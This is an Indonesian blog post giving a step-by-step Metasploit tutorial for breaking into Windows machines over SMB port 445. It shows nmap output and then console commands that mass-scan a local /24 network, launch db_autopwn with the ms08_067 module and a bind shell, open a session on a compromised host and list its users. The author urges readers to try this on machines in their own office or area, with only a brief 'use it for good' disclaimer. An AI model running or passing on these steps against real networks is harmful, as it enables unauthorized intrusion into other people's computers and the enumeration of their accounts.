RSS

nice info computer,hacking,business, viruss,n many more

Rave's Blog

"Tips METASLOITS"

disini saya akan mencoba membahas Tool baru yang sebenarnya juga tidak baru hehe… mungkin sebagian sudah mengenal Metasploit.
Metasploit adalah Framework yang didalamnya sudah terintegrasi module2 baik itu untuk Exploit maupun Auxiliary yang bisa membantu anda untuk testing Penetrasi, pengembangan IDS Signature, maupun riset Exploit.
Tool2 dan informasi yang diberikan pada situs Metasploit adalah untuk riset2 Keamanan Komputer & Jaringan yang bersifat Legal serta untuk tujuan Test semata. Diluar itu Metasploit tidak bertanggung jawab, seperti yang dilansir pada halaman muka situs mereka. Oke langsung saja saya akan mencuplik sedikit dari blog mereka di http://blog.metasploit.com/ , ini adalah Exploit keamanan dasar bagi mereka yang ingin mencobanya. Ingat Saya tidak bertanggungjawab dengan apa yang anda perbuat kemudian, saran Saya gunakan kemampuan anda sebagai Hacker (dg tujuan baik) bukan sebagai Cracker (bertujuan merusak).
Jika anda bermain2 dengan Nmap, misal saya ingin menscan port2 yang terbuka pada IP 10.178.58.209 kira2 hasilnya krg lebih seperti ini :
D:\>nmap 10.178.58.209
Starting nmap 3.81 ( http://www.insecure.org/nmap ) at 2009-02-18 13:23 SE Asia Standard Time
Interesting ports on 10.178.58.209:
(The 1651 ports scanned but not shown below are in state: closed)
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
3372/tcp  open  msdtc
12345/tcp open  NetBus
Nmap finished: 1 IP address (1 host up) scanned in 1.875 seconds
Disini kita akan mencoba meng-exploit port 445 yaitu Microsoft-DS ato Server Service dimana berguna untuk file-sharing, pada Windows 2000 dan sebelumnya kita kenal dg sebutan SMB FileSharing (port 137-139). Tujuan mengexploit port ini adalah memberikan kita akses ke DOS Prompt komputer target, dan apa jadinya jika DOS Prompt komputer target berhasil kita tembus? Kembali lagi pada Hati kita….
Ok pertama2, anda harus download Metasploit Framework dulu. Saat tutorial ini dirilis versi yg terbaru adalah v3.2, setelah anda install silahkan buka Metasploit Framework GUI. Buka Console baru pada menu Window.
crop47
Console akan muncul seperti berikut :
crop48
berturut2 ketikkan :
msf> load db_sqlite3
msf> db_create
setelah itu kita akan menscan port2 445 yang terbuka pada jaringan komputer di Kantor/Area anda.
crop49
Untuk mempercepat proses scanning ketik perintah berikut :
msf> db_nmap -sS -PS445 -p445 -n -T Aggressive aaa.bbb.ccc.0/24
crop50
Sesaat kemudian Nmap akan melakukan proses scanning, dan kemudian akan menampilkan hasilnya pada Console.
crop51
Setelah prompt msf> muncul ketikkan :
msf> db_autopwn -e -p -b -m ms08_067
crop52
Proses exploitasi dimulai, jika anda beruntung anda akan menemukan komputer target terbuka.
ketik perintah berikut jika ada komputer target yang bernasib sial hehe…
msf> sessions -l
Jika ada maka anda bisa mencoba masuk DOS Prompt menggunakan perintah “session -i [SID]“, kebetulan pada gbr komputer target yang berhasil ditembus mempunyai SID=5
msf> session -i  5
crop53

crop54
TADA….
DOS Prompt berhasil dimasuki, dan…
crop55
coba ketik perintah “ipconfig”
crop56
coba perintah “dir /w”
crop57
coba perintah “net user” –> User yang teregister pada komputer target (kebetulan ada 5 user)
crop58
Selanjutnya terserah anda, untuk mengakhiri sessions tekan CTRL+C
crop59
Akan kembali ke Console prompt lagi
crop60

Berikut penjelasan command2 yg digunakan diatas :
1.  load db_sqlite3 -> memanggil driver SQLite3, bertujuan untuk menyimpan semua parameter2 yg diperlukan oleh Metasploit Framework.
2. db_create -> membuat database baru pada SQLite3.
3. db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24 –> untuk scanning port 445, disini scope port dipersempit untuk mempercepat proses scanning. jadi hanya port 445 saja yg dicari, untuk parameter2 Nmap lainnya anda bisa baca pada manual Nmap.
4. db_autopwn -e -p -b -m ms08_067 –> -e menandakan exploit, -p port-based matching, -b menggunakan bindshell payload, -m menggunakan module ms08_067
5. sessions -l –> list sessions yg berpotensi dimasuki
6. sessions -i [SID] –> mencoba interact dg sessions yg aktif

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

0 komentar:

Posting Komentar